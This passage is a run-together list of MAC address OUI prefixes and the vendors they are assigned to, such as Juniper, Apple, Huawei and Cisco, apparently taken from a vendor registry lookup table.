Juniper Networks E4233C Juniper Networks 98868B Juniper Networks 20D80B Juniper Networks FC3342 Juniper Networks 3C8C93 Juniper Networks 0C8126 Juniper Networks 182AD3 Juniper Networks 94BF94 Juniper Networks 4C6D58 Juniper Networks 408F9D Juniper Networks AC78D1 Juniper Networks 68228E Juniper Networks D8539A Juniper Networks F8C116 Juniper Networks 88625D BITNETWORKS CO.,LTD B4B9E6 eero inc. 30B216 Hitachi Energy Germany AG A0A3B3 Espressif Inc. 34987A Espressif Inc. 685932 Sunitec Enterprise Co.,Ltd 28EBA6 Nex-T LLC C0B3C8 LLC "NTC Rotek" CC4D74 Fujian Newland Payment Technology Co., Ltd. A031EB Semikron Elektronik GmbH & Co. KG 7495A7 Keyence Corporation C836A3 GERTEC BRASIL LTDA F4EE31 Cisco Systems, Inc 4045C4 HUAWEI TECHNOLOGIES CO.,LTD 74872E HUAWEI TECHNOLOGIES CO.,LTD 3C1EB5 Apple, Inc. AC86A3 Apple, Inc. 141A97 Apple, Inc. 80D266 ScaleFlux E42150 Shanghai Chint low voltage electrical technology Co.,Ltd. D404E6 Broadcom Limited 10BE99 Netberg 60DEF4 Shenzhen iComm Semiconductor CO.,LTD 40FF40 GloquadTech 24952F Google, Inc. 047056 Arcadyan Corporation E86538 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 242A04 Cisco Systems, Inc 141AAA Metal Work SpA CCDEDE Nokia EC8A48 Arista Networks 001FD6 Shenzhen Allywll B894D9 Texas Instruments 7CE269 Texas Instruments 0804B4 Texas Instruments 30AF7E Texas Instruments 886D2D Huawei Device Co., Ltd. F8D758 Veratron AG 24FE9A CyberTAN Technology Inc. B4CBB8 Universal Electronics, Inc. 8C5DB2 IEEE Registration Authority E81098 Aruba, a Hewlett Packard Enterprise Company BC32B2 Samsung Electronics Co.,Ltd 84D352 Tonly Technology Co. Ltd 044A6A niliwi nanjing big data Co,.Ltd 64C6D2 Seiko Epson Corporation 0C3526 Microsoft Corporation 748669 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C80A35 Qingdao Hisense Smart Life Technology Co., Ltd 60B647 Silicon Laboratories 88CE3F HUAWEI TECHNOLOGIES CO.,LTD ECF8D0 HUAWEI TECHNOLOGIES CO.,LTD 30DF17 ALPSALPINE CO,.LTD D8028A Shenzhen YOUHUA Technology Co., Ltd 28CF51 Nintendo Co.,Ltd FCB0DE CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 481F66 China Mobile Group Device Co.,Ltd. B83C28 Apple, Inc. 3C6D89 Apple, Inc. AC4500 Apple, Inc. 84B1E4 Apple, Inc. 54EBE9 Apple, Inc. AC1615 Apple, Inc. EC7379 Apple, Inc. 782459 Alcatel-Lucent Enterprise F44D5C Zyxel Communications Corporation 106838 AzureWave Technology Inc. A46C24 HUAWEI TECHNOLOGIES CO.,LTD 78071C Green Energy Options Ltd 1C8BEF Beijing Xiaomi Electronics Co.,Ltd 28E297 Shanghai InfoTM Microelectronics Co.,Ltd 58F85C LLC Proizvodstvennaya Kompania "TransService" BC6BFF Guangzhou Shiyuan Electronic Technology Company Limited 304449 PLATH Signal Products GmbH & Co. KG 1CC316 Xiamen Milesight IoT Co., Ltd. 3C6A48 TP-LINK TECHNOLOGIES CO.,LTD. FC2A46 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 9CFA3C Daeyoung Electronics ECC3B0 zte corporation 087B12 Sagemcom Broadband SAS 00301A SMARTBRIDGES PTE. LTD. B457E6 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E4DBAE Extreme Networks, Inc. 70033F Pimax Technology(ShangHai)Co.,Ltd 80F1A4 HUAWEI TECHNOLOGIES CO.,LTD 80616C New H3C Technologies Co., Ltd 40B607 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5CB12E Cisco Systems, Inc 50D45C Amazon Technologies Inc. 5CC7C1 Silicon Laboratories 105F02 Private 44D506 Sichuan Tianyi Comheart Telecom Co.,LTD 2C69CC Valeo Detection Systems D46137 IEEE Registration Authority 08085C Luna Products ACC906 Apple, Inc. 04BC6D Apple, Inc. 0CB937 Ubee Interactive Co., Limited 440CEE Robert Bosch Elektronikai Kft. 488F4C shenzhen trolink Technology Co.,Ltd 744D6D HUAWEI TECHNOLOGIES CO.,LTD 2C8AC7 Ubee Interactive Co., Limited D0CF0E Sagemcom Broadband SAS BCBD84 zte corporation 80DECC HYBE Co.,LTD A0ED6D Ubee Interactive Co., Limited C435D9 Apple, Inc. C4EB42 Sagemcom Broadband SAS F8345A Hitron Technologies. Inc 70C932 Dreame Technology (Suzhou) Limited 301984 HUAWEI TECHNOLOGIES CO.,LTD F8C249 AMPERE COMPUTING LLC 648CBB Texas Instruments 74B839 Texas Instruments C4D36A Texas Instruments 988924 Texas Instruments 341593 Ruckus Wireless B08BBE ABL GmbH B8B2F7 DRIMAES INC. A8F1B2 Allwinner Technology Co., Ltd FCE9D8 Amazon Technologies Inc. 642943 D-Link Corporation 585B69 TVT CO., LTD 90F82E Amazon Technologies Inc. 842388 Ruckus Wireless 386504 Honor Device Co., Ltd. A017F1 Allwinner Technology Co., Ltd 2C6F4E Hubei Yuan Times Technology Co.,Ltd. C49894 IEEE Registration Authority 8CFADD HUAWEI TECHNOLOGIES CO.,LTD F89A25 HUAWEI TECHNOLOGIES CO.,LTD C084E0 HUAWEI TECHNOLOGIES CO.,LTD 900117 HUAWEI TECHNOLOGIES CO.,LTD 6C5CB1 Silicon Laboratories 80FD7B BLU Products Inc 589351 Huawei Device Co., Ltd. D0F4F7 Huawei Device Co., Ltd. 083A8D Espressif Inc. 2CA7EF OnePlus Technology (Shenzhen) Co., Ltd F8710C Xiaomi Communications Co Ltd 3C135A Xiaomi Communications Co Ltd E0B668 zte corporation 38BD7A Aruba, a Hewlett Packard Enterprise Company D4E98A Intel Corporate A49DDD Samsung Electronics Co.,Ltd 6C5563 Samsung Electronics Co.,Ltd 109F4F New H3C Intelligence Terminal Co., Ltd. 389E80 zte corporation 880FA2 Sagemcom Broadband SAS DC97E6 Sagemcom Broadband SAS 74D873 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 30DE4B TP-Link Corporation Limited 682624 Ergatta A0218B ACE Antenna Co., ltd 346679 HUAWEI TECHNOLOGIES CO.,LTD 448CAB Beijing Flitlink Vientiane Technology Co., LTD 2084F5 Yufei Innovation Software(Shenzhen) Co., Ltd. 142103 Calix Inc. 3425B4 Silicon Laboratories 40B15C HUAWEI TECHNOLOGIES CO.,LTD 28808A HUAWEI TECHNOLOGIES CO.,LTD 68B8BB Beijing Xiaomi Electronics Co.,Ltd 14AC60 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 1C2285 Serrature Meroni SpA D492B9 ORION NOVA, S.L. 001BB5 Cherry GmbH 68AAC4 Altice Labs S.A. EC96BF eSystems MTG GmbH D42000 IEEE Registration Authority 704DE7 TECNO MOBILE LIMITED 6C97AA AI TECHNOLOGY CO.,LTD. 6C6567 BELIMO Automation AG 50FDD5 SJI Industry Company 4C24CE Sichuan AI-Link Technology Co., Ltd. 1C97FB CoolBitX Ltd. 8C06CB Toradex AG 10E840 ZOWEE TECHNOLOGY(HEYUAN) CO., LTD. 4405E8 twareLAB 6CB133 Apple, Inc. 28E71D Arista Networks 88287D AltoBeam (China) Inc. 445ADF MIKAMI & CO., LTD. 086E9C Huawei Device Co., Ltd. C4D496 Shenzhen Excelsecu Data Technology Co.,Ltd D0DAD7 Apple, Inc. C4ACAA Apple, Inc. 2C326A Apple, Inc. 64B5F2 Samsung Electronics Co.,Ltd 4416FA Samsung Electronics Co.,Ltd FC671F Tuya Smart Inc. 78C57D Zyxel Communications Corporation 78F1C6 Cisco Systems, Inc 341B2D Cisco Systems, Inc 843C4C Robert Bosch SRL 6C72E2 amitek A40E75 Aruba, a Hewlett Packard Enterprise Company 8C3592 Guangzhou Shiyuan Electronic Technology Company Limited A0465A Motorola Mobility LLC, a Lenovo Company DCAA43 Shenzhen Terca Information Technology Co., Ltd. 00FBF9 Axiado Corporation 986610 zte corporation 38A89B Fiberhome Telecommunication Technologies Co.,LTD 6437A4 TOKYOSHUHA CO.,LTD. 90CAFA Google, Inc. 3027CF Canopy Growth Corp 88B436 FUJIFILM Corporation B8496D Apple, Inc. 9C924F Apple, Inc. 200E2B Apple, Inc. F0D793 Apple, Inc. 04D9C8 Hon Hai Precision Industry Co., Ltd. 447147 Beijing Xiaomi Electronics Co.,Ltd F4BBC7 vivo Mobile Communication Co., Ltd. A8DC5A Digital Watchdog 1C24CD ASKEY COMPUTER CORP 303D51 IEEE Registration Authority 70B306 Apple, Inc. 1CEF03 Guangzhou V-SOLUTION Electronic Technology Co., Ltd. 58B03E Nintendo Co.,Ltd AC4E65 Fiberhome Telecommunication Technologies Co.,LTD 38F0C8 Logitech 34FE1C CHOUNG HWA TECH CO.,LTD 60CF69 meerecompany 4C627B SmartCow AI Technologies Taiwan Ltd. 78C213 Sagemcom Broadband SAS 4022D8 Espressif Inc. E00871 Dongguan Liesheng Electronic Co., Ltd. 9C956E Microchip Technology Inc. A88038 ShenZhen MovingComm Technology Co., Limited BC5DA3 Sichuan Tianyi Comheart Telecom Co.,LTD 187A3E Silicon Laboratories 300505 Intel Corporate B0DCEF Intel Corporate 7413EA Intel Corporate 28BC05 BLU Products Inc 184E03 HMD Global Oy DC0B09 Cisco Systems, Inc 08F3FB Cisco Systems, Inc A036BC ASUSTek COMPUTER INC. 840BBB MitraStar Technology Corp. 906560 EM Microelectronic A0FB83 Honor Device Co., Ltd. 1073EB Infiniti Electro-Optics 2CA774 Texas Instruments DCF31C Texas Instruments 544538 Texas Instruments 38FDF5 Renesas Electronics (Penang) Sdn. Bhd. 3C26E4 Cisco Systems, Inc 3891B7 Cisco Systems, Inc 345DA8 Cisco Systems, Inc E0806B Xiaomi Communications Co Ltd 7050E7 IEEE Registration Authority 70AC08 Silicon Laboratories 38127B Crenet Labs Co., Ltd. B0E45C Samsung Electronics Co.,Ltd BC7B72 Huawei Device Co., Ltd. F82B7F Huawei Device Co., Ltd. 40C3BC Huawei Device Co., Ltd. 2853E0 Sintela Ltd D868A0 Samsung Electronics Co.,Ltd 04292E Samsung Electronics Co.,Ltd 7891DE Guangdong ACIGA Science&Technology Co.,Ltd BC4CA0 HUAWEI TECHNOLOGIES CO.,LTD 74342B HUAWEI TECHNOLOGIES CO.,LTD C412EC HUAWEI TECHNOLOGIES CO.,LTD DC360C Hitron Technologies. Inc 687FF0 TP-Link Corporation Limited AC712E Fortinet, Inc. ACA32F Solidigm Technology 4C9E6C BROADEX TECHNOLOGIES CO.LTD 1CA410 Amlogic, Inc. 200BCF Nintendo Co.,Ltd 7070FC GOLD&WATER INDUSTRIAL LIMITED 8C9806 SHENZHEN SEI ROBOTICS CO.,LTD 200889 zte corporation 2426D6 HUAWEI TECHNOLOGIES CO.,LTD EC819C HUAWEI TECHNOLOGIES CO.,LTD 200B16 Texas Instruments 8801F9 Texas Instruments F85548 Texas Instruments 68E74A Texas Instruments 70A6BD Honor Device Co., Ltd. C4A10E IEEE Registration Authority 542F04 Shanghai Longcheer Technology Co., Ltd. 88F2BD GD Midea Air-Conditioning Equipment Co.,Ltd. 6C0831 ANALOG SYSTEMS A47EFA Withings 846993 HP Inc. 746F88 zte corporation E4B633 Wuxi Stars Microsystem Technology Co., Ltd 085104 Huawei Device Co., Ltd. 785B64 Huawei Device Co., Ltd. 54E15B Huawei Device Co., Ltd. 98D93D Demant Enterprise A/S B4A678 Zhejiang Tmall Technology Co., Ltd. ACC4BD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D0989C ConMet 748469 Nintendo Co.,Ltd 5443B2 Espressif Inc. 04B97D AiVIS Co., Itd. C4C063 New H3C Technologies Co., Ltd E0798D Silicon Laboratories BCE9E2 Brocade Communications Systems LLC 18A59C IEEE Registration Authority 10961A CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. ACBF71 Bose Corporation 8CCBDF FOXCONN INTERCONNECT TECHNOLOGY 98C81C BAYTEC LIMITED EC1127 Texas Instruments 04E892 SHENNAN CIRCUITS CO.,LTD 34AD61 CELESTICA INC. 2C553C Vecima Networks Inc. 74718B Apple, Inc. 70317F Apple, Inc. A4CF99 Apple, Inc. 4C2EB4 Apple, Inc. B41974 Apple, Inc. 6095BD Apple, Inc. ACD31D Cisco Meraki CCF305 SHENZHEN TIAN XING CHUANG ZHAN ELECTRONIC CO.,LTD AC2AA1 Cisco Systems, Inc F8E94F Cisco Systems, Inc 30894A Intel Corporate 34BD20 Hangzhou Hikrobot Technology Co., Ltd. 64C269 eero inc. BC6E6D EM Microelectronic D89C8E Comcast Cable Corporation 0025CA Laird Connectivity E06CC5 Huawei Device Co., Ltd. 30963B Huawei Device Co., Ltd. 8C6BDB Huawei Device Co., Ltd. 10DA49 Huawei Device Co., Ltd. 60183A Huawei Device Co., Ltd. 18C007 Huawei Device Co., Ltd. B04A6A Samsung Electronics Co.,Ltd A8798D Samsung Electronics Co.,Ltd 5CEDF4 Samsung Electronics Co.,Ltd 283DC2 Samsung Electronics Co.,Ltd B48351 Intel Corporate BCF4D4 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 74563C GIGA-BYTE TECHNOLOGY CO.,LTD. EC551C HUAWEI TECHNOLOGIES CO.,LTD 98597A Intel Corporate 64497D Intel Corporate B8D61A Espressif Inc. 00D49E Intel Corporate DC9A7D HISENSE VISUAL TECHNOLOGY CO.,LTD 84F1D0 EHOOME IOT PRIVATE LIMITED 208BD1 NXP Semiconductor (Tianjin) LTD. 2C07F6 SKG Health Technologies Co., Ltd. 3868BE Sichuan Tianyi Comheart Telecom Co.,LTD B42875 Futecho Solutions Private Limited 302364 Nokia Shanghai Bell Co., Ltd. 0C1C1A eero inc. 3492C2 Square Route Co., Ltd. 6CA401 essensys plc 283E0C Preferred Robotics, Inc. 04BC9F Calix Inc. 8077A4 TECNO MOBILE LIMITED 7C6CF0 Shenzhen TINNO Mobile Technology Corp. 00C30A Xiaomi Communications Co Ltd 8852EB Xiaomi Communications Co Ltd 4851D0 Jiangsu Xinsheng Intelligent Technology Co., Ltd. 8C1759 Intel Corporate B83FD2 Mellanox Technologies, Inc. 30CB36 Belden Singapore Pte. Ltd. 28A53F vivo Mobile Communication Co., Ltd. 8C49B6 vivo Mobile Communication Co., Ltd. 30BB7D OnePlus Technology (Shenzhen) Co., Ltd 6C67EF HUAWEI TECHNOLOGIES CO.,LTD 88693D HUAWEI TECHNOLOGIES CO.,LTD 00991D HUAWEI TECHNOLOGIES CO.,LTD DC152D China Mobile Group Device Co.,Ltd. 0857FB Amazon Technologies Inc. 00D0FC GRANITE MICROSYSTEMS D850A1 Hunan Danuo Technology Co.,LTD 441AAC Elektrik Uretim AS EOS 2C784C Iton Technology Corp. 488759 Xiaomi Communications Co Ltd AC1E9E Xiaomi Communications Co Ltd 00D8A2 Huawei Device Co., Ltd. DC6B1B Huawei Device Co., Ltd. 98CA20 Shanghai SIMCOM Ltd. 18E7B0 Apple, Inc. 50578A Apple, Inc. D4FB8E Apple, Inc. B0DE28 Apple, Inc. 7C131D SERNET (SUZHOU) TECHNOLOGIES CORPORATION D49FDD Huawei Device Co., Ltd. 34976F Rootech, Inc. F897A9 Ericsson AB 342840 Apple, Inc. D833B7 Sagemcom Broadband SAS D06DC9 Sagemcom Broadband SAS 608CDF Beamtrail-Sole Proprietorship AC93C4 GD Midea Air-Conditioning Equipment Co.,Ltd. 000688 Telways Communication Co., Ltd. EC9B2D China Mobile Group Device Co.,Ltd. 4CFE2E DongGuan Siyoto Electronics Co., Ltd A81306 vivo Mobile Communication Co., Ltd. 6C6C0F HUAWEI TECHNOLOGIES CO.,LTD E0AEA2 HUAWEI TECHNOLOGIES CO.,LTD 44456F SHENZHEN ONEGA TECHNOLOGY CO.,LTD E8FDF8 Shanghai High-Flying Electronics Technology Co., Ltd 0C4EC0 Maxlinear Inc 1C34F1 Silicon Laboratories CC7D5B Telink Semiconductor (Shanghai) Co., Ltd. 749552 Xuzhou WIKA Electronics Control Technology Co., Ltd. FC38C4 China Grand Communications Co.,Ltd. 5CF51A Zhejiang Dahua Technology Co., Ltd. 101D51 8Mesh Networks Limited C01803 HP Inc. 04CF4B Intel Corporate CC8CBF Tuya Smart Inc. D01B1F OHSUNG 6C4BB4 HUMAX Co., Ltd. 589BF7 Hefei Radio Communication Technology Co., Ltd 000E24 Huwell Technology Inc. 4C7713 Renesas Electronics (Penang) Sdn. Bhd. D8AA59 Tonly Technology Co. Ltd 64CF13 Weigao Nikkiso(Weihai)Dialysis Equipment Co.,Ltd 8C497A Extreme Networks, Inc. 7CB566 Intel Corporate 50E9DF Quectel Wireless Solutions Co.,Ltd. E8FA23 Huawei Device Co., Ltd. 40329D Union Image Co.,Ltd 50A030 IEEE Registration Authority 845F04 Samsung Electronics Co.,Ltd 9C2F9D Liteon Technology Corporation A4F33B zte corporation EC3A52 Huawei Device Co., Ltd. 441B88 Apple, Inc. 80045F Apple, Inc. 9C3E53 Apple, Inc. C889F3 Apple, Inc. 10B9C4 Apple, Inc. 901195 Amazon Technologies Inc. 44EA30 Samsung Electronics Co.,Ltd 60109E HUAWEI TECHNOLOGIES CO.,LTD 30E7BC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 040D84 Silicon Laboratories 4C195D Sagemcom Broadband SAS 0013DC IBTEK INC. D84A2B zte corporation D0F99B zte corporation F41399 Aerospace new generation communications Co.,Ltd A4438C ARRIS Group, Inc. 9C7403 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 3CECDE FUJIAN STAR-NET COMMUNICATION CO.,LTD 9C6B00 ASRock Incorporation 98672E Skullcandy 480286 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 94DEB8 Silicon Laboratories 54F82A u-blox AG D43538 Beijing Xiaomi Mobile Software Co., Ltd 10CE02 Amazon Technologies Inc. 641ABA Dryad Networks GmbH 349454 Espressif Inc. A83A48 Ubiqcom India Pvt Ltd C85ACF HP Inc. FC29E3 Infinix mobility limited 642FC7 New H3C Technologies Co., Ltd 6026AA Cisco Systems, Inc 5C3192 Cisco Systems, Inc 94A9A8 Texas Instruments 48B423 Amazon Technologies Inc. 7070AA Amazon Technologies Inc. D413F8 Peplink International Ltd. 9C1C6D HEFEI DATANG STORAGE TECHNOLOGY CO.,LTD 88C227 HUAWEI TECHNOLOGIES CO.,LTD 8054D9 HUAWEI TECHNOLOGIES CO.,LTD 9C8566 Wingtech Mobile Communications Co.,Ltd. 9CEC61 Huawei Device Co., Ltd. 747069 Huawei Device Co., Ltd. 14FB70 Huawei Device Co., Ltd. 84D3D5 Huawei Device Co., Ltd. FC7692 Semptian Co.,Ltd. 001117 CESNET B03366 vivo Mobile Communication Co., Ltd. 7CC225 Samsung Electronics Co.,Ltd FCAFBE TireCheck GmbH 4CABF8 ASKEY COMPUTER CORP C8418A Samsung Electronics.,LTD 686725 Espressif Inc. 886EE1 Erbe Elektromedizin GmbH C475AB Intel Corporate 80B745 The Silk Technologies ILC LTD 1848BE Amazon Technologies Inc. 202027 Shenzhen Sundray Technologies Company Limited 64BF6B HUAWEI TECHNOLOGIES CO.,LTD 30499E HUAWEI TECHNOLOGIES CO.,LTD 9C00D3 SHENZHEN IK WORLD Technology Co., Ltd 282D06 AMPAK Technology,Inc. F89E94 Intel Corporate 644212 Shenzhen Water World Information Co.,Ltd. 202B20 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. A0A309 Apple, Inc. 5C50D9 Apple, Inc. 884D7C Apple, Inc. A8FE9D Apple, Inc. DC973A Verana Networks 2066FD CONSTELL8 NV E8CAC8 Hui Zhou Gaoshengda Technology Co.,LTD D419F6 NXP Semiconductor (Tianjin) LTD. C403A8 Intel Corporate 0CB088 AITelecom D463DE vivo Mobile Communication Co., Ltd. 18A9A6 Nebra Ltd B0F7C4 Amazon Technologies Inc. 8C5646 LG Electronics CC7190 VIETNAM POST AND TELECOMMUNICATION INDUSTRY TECHNOLOGY JOINT STOCK COMPANY A85BF7 Aruba, a Hewlett Packard Enterprise Company 0C9043 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 541F8D zte corporation 2CF1BB zte corporation BC2CE6 Cisco Systems, Inc CCED4D Cisco Systems, Inc 6C0F0B China Mobile Group Device Co.,Ltd. D4B7D0 Ciena Corporation 1400E9 Mitel Networks Corporation 24698E SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 48BD4A HUAWEI TECHNOLOGIES CO.,LTD A8D4E0 HUAWEI TECHNOLOGIES CO.,LTD A0406F HUAWEI TECHNOLOGIES CO.,LTD 004F1A HUAWEI TECHNOLOGIES CO.,LTD 7433A6 Shenzhen SuperElectron Technology Co.,Ltd. 2C0DA7 Intel Corporate 547D40 Powervision Tech Inc. C0D7AA Arcadyan Corporation ACACE2 CHANGHONG (HONGKONG) TRADING LIMITED 4C8D53 HUAWEI TECHNOLOGIES CO.,LTD DC2C6E Routerboard.com 3429EF Qingdao Haier Technology Co.,Ltd A0B53C Technicolor Delivery Technologies Belgium NV C4BDE5 Intel Corporate 5C0214 Beijing Xiaomi Mobile Software Co., Ltd E42805 Pivotal Optics 381F8D Tuya Smart Inc. 6CB0FD Shenzhen Xinghai Iot Technology Co.,Ltd FC5F49 Zhejiang Dahua Technology Co., Ltd. 3453D2 Sagemcom Broadband SAS 18EF3A Sichuan AI-Link Technology Co., Ltd. A0FF22 SHENZHEN APICAL TECHNOLOGY CO., LTD 3035C5 Huawei Device Co., Ltd. F820A9 Huawei Device Co., Ltd. 649E31 Beijing Xiaomi Mobile Software Co., Ltd 541D61 YEESTOR Microelectronics Co., Ltd 700971 Samsung Electronics Co.,Ltd D01B49 Samsung Electronics Co.,Ltd 00B0EC EACEM 6CD3EE ZIMI CORPORATION 24CD8D Murata Manufacturing Co., Ltd. 7CC177 INGRAM MICRO SERVICES 7876D9 EXARA Group 94A408 Shenzhen Trolink Technology CO, LTD D0F865 ITEL MOBILE LIMITED 3C9FC3 Beijing Sinead Technology Co., Ltd. 608FA4 Nokia Solutions and Networks GmbH & Co. KG 385C76 PLANTRONICS, INC. 38FDF8 Cisco Systems, Inc 84A938 LCFC(HeFei) Electronics Technology co., ltd F856C3 zte corporation 10321D HUAWEI TECHNOLOGIES CO.,LTD E4936A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4877BD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 208C47 Tenstorrent Inc 6815D3 Zaklady Elektroniki i Mechaniki Precyzyjnej R&G S.A. 0080E7 Leonardo UK Ltd 04CD15 Silicon Laboratories 785EA2 Sunitec Enterprise Co.,Ltd DCF4CA Apple, Inc. 7CFC16 Apple, Inc. 88B945 Apple, Inc. B0BE83 Apple, Inc. B40ECF Bouffalo Lab (Nanjing) Co., Ltd. 745CFA Shenzhen Shunrui Gaojie Technology Co., Ltd. 5CDFB8 Shenzhen Unionmemory Information System Limited E00AF6 Liteon Technology Corporation 18E1DE Chengdu ChipIntelli Technology Co., Ltd 8CF681 Silicon Laboratories 7C66EF Hon Hai Precision IND.CO.,LTD 441793 Espressif Inc. 00A388 SKY UK LIMITED 9C50D1 Murata Manufacturing Co., Ltd. 140020 LongSung Technology (Shanghai) Co.,Ltd. 30B930 zte corporation 949869 zte corporation 7C8437 China Post Communications Equipment Co., Ltd. B84D43 HUNAN FN-LINK TECHNOLOGY LIMITED 503DEB Zhejiang Tmall Technology Co., Ltd. F87FA5 GREATEK D86852 HUAWEI TECHNOLOGIES CO.,LTD AC6490 HUAWEI TECHNOLOGIES CO.,LTD A84A63 TPV Display Technology(Xiamen) Co.,Ltd. 243FAA Huawei Device Co., Ltd. D867D3 Huawei Device Co., Ltd. 48474B Huawei Device Co., Ltd. 806F1C Huawei Device Co., Ltd. E0A258 Wanbang Digital Energy Co.,Ltd 4CBCE9 LG Innotek C89F1A HUAWEI TECHNOLOGIES CO.,LTD 2C0547 Shenzhen Phaten Tech. LTD E0C58F China Mobile IOT Company Limited 785005 MOKO TECHNOLOGY Ltd 2C1A05 Cisco Systems, Inc 2C3A91 Huawei Device Co., Ltd. 64F705 Huawei Device Co., Ltd. 60CE41 HUAWEI TECHNOLOGIES CO.,LTD 281709 HUAWEI TECHNOLOGIES CO.,LTD 606EE8 Xiaomi Communications Co Ltd EC97E0 Hangzhou Ezviz Software Co.,Ltd. D0B66F SERNET (SUZHOU) TECHNOLOGIES CORPORATION F0B61E Intel Corporate C84D44 Shenzhen Jiapeng Huaxiang Technology Co.,Ltd 701AD5 Openpath Security, Inc. FC2E19 China Mobile Group Device Co.,Ltd. 50F908 Wizardlab Co., Ltd. 98B177 LANDIS + GYR A029BD Team Group Inc 64DCDE ZheJiang FuChunJiang Information Technology Co.,Ltd 00919E Intel Corporate EC94CB Espressif Inc. 50C2E8 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 3009C0 Motorola Mobility LLC, a Lenovo Company 0CE159 Shenzhen iStartek Technology Co., Ltd. F83869 LG Electronics F05ECD Texas Instruments B04692 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD AC764C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5C58E6 Palo Alto Networks 7086CE GD Midea Air-Conditioning Equipment Co.,Ltd. 500F59 STMicrolectronics International NV 90B57F Shenzhen iComm Semiconductor CO.,LTD E42AAC Microsoft Corporation 806A10 Whisker Labs - Ting C0F827 Rapidmax Technology Corporation 001413 Trebing & Himstedt Prozeßautomation GmbH & Co. KG 000799 Tipping Point Technologies, Inc. DC8D8A Nokia Solutions and Networks GmbH & Co. KG ACEC85 eero inc. B8DAE8 Huawei Device Co., Ltd. B8AE1D Guangzhou Xingyi Electronic Technology Co.,Ltd 241D48 Sichuan Tianyi Comheart Telecom Co.,LTD 287777 zte corporation 245E48 Apple, Inc. 08C729 Apple, Inc. 60E32B Intel Corporate D8BE65 Amazon Technologies Inc. 28DEA8 zte corporation 20E7B6 Universal Electronics, Inc. 808ABD Samsung Electronics Co.,Ltd 3CCD57 Beijing Xiaomi Mobile Software Co., Ltd C4C36B Apple, Inc. E8A730 Apple, Inc. 6006E3 Apple, Inc. D43DF3 Zyxel Communications Corporation 20579E HUNAN FN-LINK TECHNOLOGY LIMITED E06781 Dongguan Liesheng Electronic Co., Ltd. C884CF HUAWEI TECHNOLOGIES CO.,LTD E023D7 Sleep Number D4548B Intel Corporate 1009F9 Amazon Technologies Inc. D03E7D CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. 60B6E1 Texas Instruments A864F1 Intel Corporate D01E1D SaiNXT Technologies LLP 78BB88 Maxio Technology (Hangzhou) Ltd. A42A71 Sichuan Tianyi Comheart Telecom Co.,LTD 60A5E2 Intel Corporate 106FD9 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 584D42 Dragos, Inc. 608A10 Microchip Technology Inc. 446752 Wistron INFOCOMM (Zhongshan) CORPORATION A82316 Nokia 38E39F Motorola Mobility LLC, a Lenovo Company 84EBEF Cisco Systems, Inc 908060 Nilfisk A/S 70A6CC Intel Corporate 6C433C TECNO MOBILE LIMITED 48F8FF CHENGDU KT ELECTRONIC HI-TECH CO.,LTD E8C1E8 Shenzhen Xiao Bi En Culture Education Technology Co.,Ltd. 8CFD15 Imagine Marketing Private Limited 14223B Google, Inc. 683A48 SAMJIN Co., Ltd. B027CF Extreme Networks, Inc. D48DD9 Meld Technology, Inc 582FF7 Sagemcom Broadband SAS ACE77B Sichuan Tianyi Comheart Telecom Co.,LTD 40F420 Sichuan Tianyi Comheart Telecom Co.,LTD 6C79B8 Texas Instruments 8CA399 SERVERCOM (INDIA) PRIVATE LIMITED 906976 Withrobot Inc. FC9257 Renesas Electronics (Penang) Sdn. Bhd. E408E7 Quectel Wireless Solutions Co.,Ltd. C4FF22 Huawei Device Co., Ltd. A0A0DC Huawei Device Co., Ltd. C4808A Cloud Diagnostics Canada ULC 60DB15 New H3C Technologies Co., Ltd 5CA721 New H3C Technologies Co., Ltd 98F217 Castlenet Technology Inc. 445BED Aruba, a Hewlett Packard Enterprise Company 645D92 Sichuan Tianyi Comheart Telecom Co.,LTD CCA260 Sichuan Tianyi Comheart Telecom Co.,LTD 9C6121 Sichuan Tianyi Comheart Telecom Co.,LTD E04FBD Sichuan Tianyi Comheart Telecom Co.,LTD 5CA176 Sichuan Tianyi Comheart Telecom Co.,LTD 7C70DB Intel Corporate 8C94CC SFR 2CDDE9 Arista Networks 709741 Arcadyan Corporation ACD829 Bouffalo Lab (Nanjing) Co., Ltd. 60577D eero inc. B0C952 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D0E042 Cisco Systems, Inc CC0DE7 B METERS S.R.L. 4456E2 Sichuan Tianyi Comheart Telecom Co.,LTD 54AED2 CSL Dualcom Ltd 3C3712 AVM Audiovisuelles Marketing und Computersysteme GmbH C8BB81 Huawei Device Co., Ltd. 1C472F Huawei Device Co., Ltd. 205E64 Huawei Device Co., Ltd. F4419E Huawei Device Co., Ltd. 90F9B7 HUAWEI TECHNOLOGIES CO.,LTD F44588 HUAWEI TECHNOLOGIES CO.,LTD C47469 BT9 F46FA4 Physik Instrumente GmbH & Co. KG F44EE3 Intel Corporate 78F235 Sichuan AI-Link Technology Co., Ltd. 4CD3AF HMD Global Oy C85142 Samsung Electronics Co.,Ltd 10E4C2 Samsung Electronics Co.,Ltd 0C8DCA Samsung Electronics Co.,Ltd 80B655 Intel Corporate 0CCB0C iSYS RTS GmbH 082FE9 HUAWEI TECHNOLOGIES 